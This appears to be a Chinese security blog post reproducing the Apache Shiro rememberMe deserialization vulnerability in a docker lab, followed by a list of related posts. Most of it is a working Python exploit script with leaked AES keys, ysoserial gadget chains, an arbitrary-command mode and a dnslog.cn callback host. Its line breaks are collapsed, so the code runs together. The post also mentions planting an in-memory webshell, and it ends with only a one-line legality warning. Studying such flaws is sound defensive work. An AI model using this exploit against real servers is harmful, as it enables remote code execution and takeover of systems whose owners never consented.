漏洞复现——shiro反序列化
今天咱们的主角是shiro反序列化命令执行漏洞。该漏洞在HVV等大型攻防项目中,经常被作为突破口。简单介绍了解一下还是很有必要的。废话不多说,进入正题。
一、漏洞描述:
Apache Shiro是美国阿帕奇(Apache)软件基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。
Apache Shiro 1.0.0版本至1.2.4版本中存在信息泄露漏洞,该漏洞源于程序未能正确配置‘remember me’功能使用的密钥。攻击者可通过发送带有特制参数的请求利用该漏洞执行任意代码或访问受限制内容。
二、漏洞原理:
AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。
详细漏洞原理介绍参考:
https://baijiahao.baidu.com/s?id=1719489508581577349&wfr=spider&for=pc
三、漏洞复现
3.1环境搭建
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
访问http://localhost:8081即可
3.2漏洞检测
python shiro_exploit.py -u http://192.168.3.3:8081
扫描脚本:shiro_exploit.py
#! python2.7
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import json
import time
import random
import argparse
from Crypto.Cipher import AESJAR_FILE = 'ysoserial.jar'CipherKeys = ["kPH+bIxk5D2deZiIxcaaaA==","4AvVhmFLUs0KTA3Kprsdag==","3AvVhmFLUs0KTA3Kprsdag==","2AvVhdsgUs0FSA3SDFAdag==","6ZmI6I2j5Y+R5aSn5ZOlAA==","wGiHplamyXlVB11UXWol8g==","cmVtZW1iZXJNZQAAAAAAAA==","Z3VucwAAAAAAAAAAAAAAAA==","ZnJlc2h6Y24xMjM0NTY3OA==","L7RioUULEFhRyxM7a2R/Yg==","RVZBTk5JR0hUTFlfV0FPVQ==","fCq+/xW488hMTCD+cmJ3aQ==","WkhBTkdYSUFPSEVJX0NBVA==","1QWLxg+NYmxraMoxAXu/Iw==","WcfHGU25gNnTxTlmJMeSpw==","a2VlcE9uR29pbmdBbmRGaQ==","bWluZS1hc3NldC1rZXk6QQ==","5aaC5qKm5oqA5pyvAAAAAA==",#"ZWvohmPdUsAWT3=KpPqda","r0e3c16IdVkouZgk1TKVMg==","ZUdsaGJuSmxibVI2ZHc9PQ==","U3ByaW5nQmxhZGUAAAAAAA==","LEGEND-CAMPUS-CIPHERKEY=="#"kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",]gadgets = ["JRMPClient","BeanShell1","Clojure","CommonsBeanutils1","CommonsCollections1","CommonsCollections2","CommonsCollections3","CommonsCollections4","CommonsCollections5","CommonsCollections6","CommonsCollections7","Groovy1","Hibernate1","Hibernate2","JSON1","JavassistWeld1","Jython1","MozillaRhino1","MozillaRhino2","Myfaces1","ROME","Spring1","Spring2","Vaadin1","Wicket1"]session = requests.Session()
def genpayload(params, CipherKey,fp):gadget,command = paramsif not os.path.exists(fp):raise Exception('jar file not found')popen = subprocess.Popen(['java','-jar',fp,gadget,command],stdout=subprocess.PIPE)BS = AES.block_size#print(command)pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()#key = "kPH+bIxk5D2deZiIxcaaaA=="mode = AES.MODE_CBCiv = uuid.uuid4().bytesencryptor = AES.new(base64.b64decode(CipherKey), mode, iv)file_body = pad(popen.stdout.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextdef getdomain():try :ret = session.get("http://www.dnslog.cn/getdomain.php?t="+str(random.randint(100000,999999)),timeout=10).textexcept Exception as e:print("getdomain error:" + str(e))ret = "error"passreturn retdef getrecord():try :ret = session.get("http://www.dnslog.cn/getrecords.php?t="+str(random.randint(100000,999999)),timeout=10).text#print(ret)except Exception as e:print("getrecord error:" + str(e))ret = "error"passreturn retdef check(url):if '://' not in url:target = 'https://%s' % url if ':443' in url else 'http://%s' % urlelse:target = urlprint("checking url:" + url)domain = getdnshost()if domain:reversehost = "http://" + domainfor CipherKey in CipherKeys:ret = {"vul":False,"CipherKey":"","url":target}try:print("try CipherKey :" +CipherKey)payload = genpayload(("URLDNS",reversehost),CipherKey,JAR_FILE)print("generator payload done.")r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)print("send payload ok.")for i in range(1,5):print("checking.....")time.sleep(2)temp = getrecord()if domain in temp:ret["vul"] = Trueret["CipherKey"] = CipherKeybreakexcept Exception as e:print(str(e))passif ret["vul"]:breakelse:print("get dns host error")return retdef exploit(url,gadget,params,CipherKey):if '://' not in url:target = 'https://%s' % url if ':443' in url else 'http://%s' % urlelse:target = urltry:payload = genpayload((gadget, params),CipherKey,JAR_FILE)r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)print(r.text)except Exception as e:print("exploit error:" + str(e))passdef getdnshost():reversehost = ""try :domain = getdomain()if domain=="error":print("getdomain error")else:#reversehost = "http://" +domainreversehost = domain#print("got reversehost : " + reversehost)except:passreturn reversehostdef detector(url,CipherKey,command):result = []if '://' not in url:target = 'https://%s' % url if ':443' in url else 'http://%s' % urlelse:target = urltry:for g in gadgets:g = g.strip()domain = getdnshost()if domain:if g == "JRMPClient":param = "%s:80" % domainelse:param = command.replace("{dnshost}",domain)payload = genpayload((g, param),CipherKey,JAR_FILE)print(g + " testing.....")r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)#print(r.read())for i in range(1,5):#print("checking.....")time.sleep(2)temp = getrecord()if domain in temp:ret = g#ret["CipherKey"] = CipherKeyresult.append(ret)print("found gadget:\t" + g)breakelse:print("get dns host error")#break#print(r.text)except Exception as e:print("detector error:" + str(e))passreturn resultdef parser_error(errmsg):print("Usage: python " + sys.argv[0] + " [Options] use -h for help")sys.exit()def parse_args():# parse the argumentsparser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target")parser.error = parser_errorparser._optionals.title = "OPTIONS"parser.add_argument('-u', '--url', help="Target url.", default="http://127.0.0.1:8080",required=True)parser.add_argument('-t', '--type', help='Check or Exploit. Check :1 , Exploit:2 , Find gadget:3', default="1",required=False)parser.add_argument('-g', '--gadget', help='gadget', default="CommonsCollections2",required=False)parser.add_argument('-p', '--params', help='gadget params',default="whoami",required=False)parser.add_argument('-k', '--key', help='CipherKey',default="kPH+bIxk5D2deZiIxcaaaA==",required=False)return parser.parse_args()if __name__ == '__main__':args = parse_args()url = args.urltype = args.typecommand = args.paramskey = args.keygadget = args.gadgetif type=="1":r = check(url)print("\nvulnerable:%s url:%s\tCipherKey:%s\n" %(str(r["vul"]),url,r["CipherKey"]))elif type=="2":exploit(url,gadget,command,key)print("exploit done.")elif type=="3":r = detector(url,key,command)if r :print("found gadget:\n")print(r)else:print("invalid type")
也可以直接用工具检测
各种工具齐上阵,注入内存马用冰蝎试试
没毛病,接下来想干啥就能干啥了。
以上为实验环境,实战中切记合法测试,否则将会得到一副“银手镯”奖励哦。
漏洞复现——shiro反序列化相关推荐
- 210104-技术分享-漏洞复现-shiro
目录 2021年1月4日 技术分享-漏洞复现-shiro by:leesin(ps:内部使用,未经授权不得外发) 1. shiro反序列号漏洞 1.1 漏洞形成原因 1.2 复现工具 1.3 工具使用 ...
- 每天一个漏洞之——shiro反序列化
每天一个漏洞之--shiro反序列化 原因:Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie.在服务端对rememberMe的 ...
- Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞
环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...
- rmi反序列化导致rce漏洞修复_RMI反序列化漏洞分析
原创:Xman21合天智汇 一.RMI简介 首先看一下RMI在wikipedia上的描述: Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Ja ...
- [Vulhub] Weblogic 漏洞复现
文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...
- Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
- shiro反序列化漏洞的原理和复现
一.shiro简介 Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理.Shiro首要的和最重要的目标就是容易使用并且容易理解. 二.shiro的身份认证工作 ...
- shiro反序列化漏洞学习(工具+原理+复现)
工具准备 1.java8 C:\Program Files\Java 2.冰蝎 C:\Users\ali\Desktop\tools\Behinder_v4.0.6 3.shiro反序列化 图形化工具 ...
- Shiro RememberMe反序列化漏洞复现(Shiro-550)
0x00 漏洞原理简要分析 官方说明:https://issues.apache.org/jira/browse/SHIRO-550 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器 ...
最新文章
- 菜鸟物流云是如何帮助快递合作伙伴解决双11巨大业务负荷的?
- Spring Boot加载配置文件
- linux命令chmod
- 深入理解linux内核: linux内核(二)
- 入门系列之在Ubuntu上安装Drone持续集成环境
- 大型项目中会出现的一些问题:
- Adobe AIR for html/js人员
- 书中自有黄金屋~外加中奖结果通知
- oncreate为什么一定要调用父类的oncreat_为什么你老是讲不清楚JS的继承模式
- Docker+Jenkins持续集成环境(2)使用docker+jenkins构建nodejs前端项目
- clion远程调试linux内核,Clion + 树莓派/Ubuntu 远程调试
- SpringCloud学习笔记013---Spring的@PostConstruct标签_初始化项目字典
- java 快逸报表_报表展现输出 | 快逸报表工具 java报表软件
- 双子星tv源码_双子星IPTV电视直播管理系统源码安装教程
- python如何屏幕截图_Python实现屏幕截图的两种方式
- Opus 和 AAC 声音编码格式
- Vue中的SEO优化
- ie浏览器调用本地文件无反应_四种办法教你IE浏览器点击没反应,启动不了如何解决--系统之家...
- 腾讯云+CentOS 7.2+python:搭建微信公众号后台入门教程
- 微信公众平台学习笔记
热门文章
- 【项目管理】项目中的角色
- go环境编译singularity失败报错:checking: host Go compiler (at least version 1.13或17)... not found!
- android8.1新建分区并挂载,Android8.1 MTK Vendor分区大小调整无效分析
- Java基础笔记_6_类和对象_成员变量
- linux ati显卡驱动下载,教你在Linux中安装ATI显卡驱动(图)
- 07_02Redis
- 品牌对比|斯凯奇 VS 李宁
- 关于js阻止冒泡时的一些坑
- Mybatis-笔记1
- Android微信hook